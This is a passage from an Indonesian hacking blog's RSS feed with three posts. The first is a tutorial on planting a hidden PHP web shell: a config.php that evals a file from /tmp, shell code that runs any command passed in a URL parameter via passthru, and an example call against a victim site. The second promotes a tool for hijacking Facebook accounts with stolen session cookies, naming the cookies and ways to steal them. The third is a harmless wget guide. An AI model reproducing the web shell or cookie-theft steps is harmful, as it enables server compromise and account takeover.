misal..&lt;br /&gt;&lt;br /&gt;kita punya shell yang kita simpan di folder tmp dengan file shell.txt nah kita ingin memanggilnya maka untuk kita inject di file php yang ada di public_html. Caranya tinggal kita panggil dengan fungsi &lt;span style="color: rgb(0, 153, 0);"&gt;file_get_contents()&lt;/span&gt; dan bantuan fungsi &lt;span style="color: rgb(0, 153, 0);"&gt;eval()&lt;/span&gt; (untuk lebih jelasnya fungsi ini bisa liat di php manual). contoh :&lt;br /&gt;&lt;br /&gt;&lt;blockquote style="color: rgb(0, 153, 0);"&gt;--- file config.php ---&lt;br /&gt;&lt;br /&gt;&amp;lt;?php&lt;br /&gt;$password = 'root';&lt;br /&gt;$username = 'root';&lt;br /&gt;eval(file_get_contents('/tmp/shell.txt'));&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;br /&gt;--- end file config.php ---&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;nah dengan isi shell.txt seperti ini misal.&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;--- file shell.txt ---&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;&amp;lt;?php&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;echo "&amp;lt;form method='POST'&amp;gt;";&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;echo "&amp;lt;input type='txt' name='thund3rcmd'&amp;gt;";&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;echo "&amp;lt;/form&amp;gt;";&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;$cmd = passthru($_GET['thund3rcmd']);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;if(!empty($cmd)) {&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;?&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;&amp;lt;pre&amp;gt;$cmd&amp;lt;/pre&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;&amp;lt;?php }} ?&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;--- end shell.txt ---&lt;/span&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;itu misalnya saja.. nah itu di simpen di folder tmp. jadi kita manggilnya kayak gini&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;hxxp://victim.com/config.php?cwd=hackedbythund3r-x2&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;dan mudah mudahan.. klo shell ga error.. pasti bisa di exekusi.&lt;br /&gt;&lt;br /&gt;dengan cara menggunakan fungsi &lt;span style="color: rgb(0, 153, 0);"&gt;file_get_contents() &lt;/span&gt;tadi. maka size file yang di inject ga akan terlalu membengkak..&lt;br /&gt;&lt;br /&gt;sebenernya banyak cara lain.. ya tergantung creativitas yang pake aja deh.. seep..&lt;br /&gt;be creative..&lt;br /&gt;&lt;br /&gt;Segitu aja dulu.. :D&lt;br /&gt;seep&lt;br /&gt;&lt;br /&gt;kekurangan harap di maklum. tapi klo kelebihan hmm.. balikin aja ya.. :D&lt;br /&gt;&lt;br /&gt;thanks for phpshellnya Gblack a.k.a biadabz&lt;br /&gt;&lt;/teserah&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7362652417827057762-6760147050059512495?l=www.thund3r-x2.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.thund3r-x2.co.cc/2009/05/hidden-shell-and-inject-shell.html</link><author>noreply@blogger.com (thund3r_x2)</author><thr:total>3</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7362652417827057762.post-8215427715777283949</guid><pubDate>Sat, 09 May 2009 16:47:00 +0000</pubDate><atom:updated>2009-09-24T05:48:57.872-07:00</atom:updated><title>FBController for stealing Facebook Priv</title><description>Pernah denger tool yang namanya FBController?? pasti ada yang udah ada yang belum kan..&lt;br /&gt;hee.. tool ini bukan tool buat hacking account facebook tapi sekali loe dapetin victim pake ni tool loe bisa control semua fasilitas di facebook. tool ini di buat oleh "Azim Poonawala" bisa diliat di blognya &lt;a href="http://my.opera.com/quakerdoomer/blog"&gt;disini&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Kita bisa mengontrol facebook victim dengan cookie yang sudah kita ambil dari accountnya saat login.. cookie bisa didapat dengan cara menggunakan teknik sniffing, xss, social enginerering, ARP Poison Sniffing, atau searching di search engine -  search engine yang ada.&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;beberapa variable cookie yang di perlukan adalah&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;datr&lt;/li&gt;&lt;li&gt;ABT&lt;/li&gt;&lt;li&gt;s_vsn_facebookpoc_1&lt;/li&gt;&lt;li&gt;login_x&lt;/li&gt;&lt;li&gt;xs&lt;/li&gt;&lt;li&gt;c_user&lt;/li&gt;&lt;li&gt;h_user&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;untuk information lebih lagi bisa liat disini&lt;br /&gt;&lt;br /&gt;download &lt;a href="http://www.fileden.com/files/2008/9/18/2104312/FBConTroller.RAR"&gt;FBController.rar&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7362652417827057762-8215427715777283949?l=www.thund3r-x2.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.thund3r-x2.co.cc/2009/05/fbcontroller-for-stealing-facebook-priv.html</link><author>noreply@blogger.com (thund3r_x2)</author><thr:total>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7362652417827057762.post-2415855528538488439</guid><pubDate>Fri, 08 May 2009 07:29:00 +0000</pubDate><atom:updated>2009-09-24T05:48:31.330-07:00</atom:updated><title>wget help</title><description>wget adalah salah satu tool bagus buat download.. kenapa soalnya fungsi wget banyak banget.. ngga cuma download biasa.. aku jelasin beberap fungsi wget.. sebenernya dah ada bantuan gimana caranya download pake wget.. tinggal ketik aja wget -h trus enter.. ntar keluar banyak option buat ningkatin kemampuan wget download..&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;yang pertama option yang sering di pake itu -c dan -b..&lt;br /&gt;&lt;br /&gt;option -c ini dipake buat continue.. maksudnya kalau koneksinya jelek trus putus - putus. nah saat itu pasti download juga putus.. pake option ini kita bisa continue download sebelumny dari bagian file yang terkhir sebelumnya..&lt;br /&gt;&lt;br /&gt;contoh : wget -c http://sitescampage.com/file/downloads/asik.exe&lt;br /&gt;&lt;br /&gt;option -b ini dipake buat background.. maksudnya kita bisa tinggalin download jika kita menggunakan akses remote dan kita ingin mematikan akses remotenya..&lt;br /&gt;&lt;br /&gt;contoh : wget -b http://sitescampage.com/file/downloads/asik.exe&lt;br /&gt;&lt;br /&gt;option -r ini dipake buat download suatu web secara langsung. jadi kita bisa di bilang punya back up site orang lain di komputer kita sendiri.&lt;br /&gt;&lt;br /&gt;contoh : wget -r http://sitescampage.com/file/downloads/asik.exe&lt;br /&gt;&lt;br /&gt;option --tries=n ini dipake untuk mengulang download hingga n kali. di gunakan karena ada masalah dengan koneksi mungkin karena lelet.. atau mungkin bisa jadi kita tidak ingin download ulang terlalu sering.&lt;br /&gt;&lt;br /&gt;contoh : wget --tries=5 http://sitescampage.com/file/downloads/asik.exe&lt;br /&gt;&lt;br /&gt;option -N di gunakan untuk mendownload file terbaru dari yang ada di local.. bisa diistilahkan update file lama dengan yang baru..&lt;br /&gt;&lt;br /&gt;contoh : wget -N http://sitescampage.com/file/downloads/asik.exe&lt;br /&gt;&lt;br /&gt;option --limit-rate=nK di gunakan untuk mendownload tapi dengan kecepetan yang kita tentukan dengan mengganti nilai n di belakang sama dengan. K (kilobyte)&lt;br /&gt;&lt;br /&gt;contoh : wget -bc --limit-rate=10k http://sitescampage.com/file/downloads/asik.exe&lt;br /&gt;&lt;br /&gt;option --http-user=USERNAME --http-password=PASSWORD ini digunakan untuk mendownload file dari web yang menggunakan password.&lt;br /&gt;&lt;br /&gt;option --ftp-user=USERNAME --ftp-password=PASSWORD sama dengan option http. bedanya ini digunakan untuk download via ftp&lt;br /&gt;&lt;br /&gt;option --proxy-user=USERNAME --proxy-password=PASSWORD ini digunakan untuk mendownload file melalui proxy&lt;br /&gt;&lt;br /&gt;option --no-check-certificate ini digunakan untuk mendowload tanpa menggunakan check certificate bila melalu protokol https&lt;br /&gt;&lt;br /&gt;option -m ini digunakan untuk membuat miror dari sebuah ftp&lt;br /&gt;&lt;br /&gt;masih banyak lagi option - option lain yang mungkin nantinya di butuhkan..&lt;br /&gt;untuk menggunakan option :&lt;br /&gt;&lt;br /&gt;example&lt;br /&gt;wget -brc http://sitescampage.com&lt;br /&gt;atau bisa juga seperti ini&lt;br /&gt;wget -b -r -c http://sitescampage.com&lt;br /&gt;&lt;br /&gt;reference:&lt;br /&gt;&lt;a href="http://google.com/"&gt;google.com&lt;/a&gt;&lt;br /&gt;&lt;a href="http://fossil.amikom.ac.id/"&gt;fossil.amikom.ac.id&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.antiteori.com/"&gt;www.antiteori.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7362652417827057762-2415855528538488439?l=www.thund3r-x2.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.thund3r-x2.co.cc/2009/05/wget-help.html</link><author>noreply@blogger.com (thund3r_x2)</author><thr:total>2</thr:total></item></channel></rss>
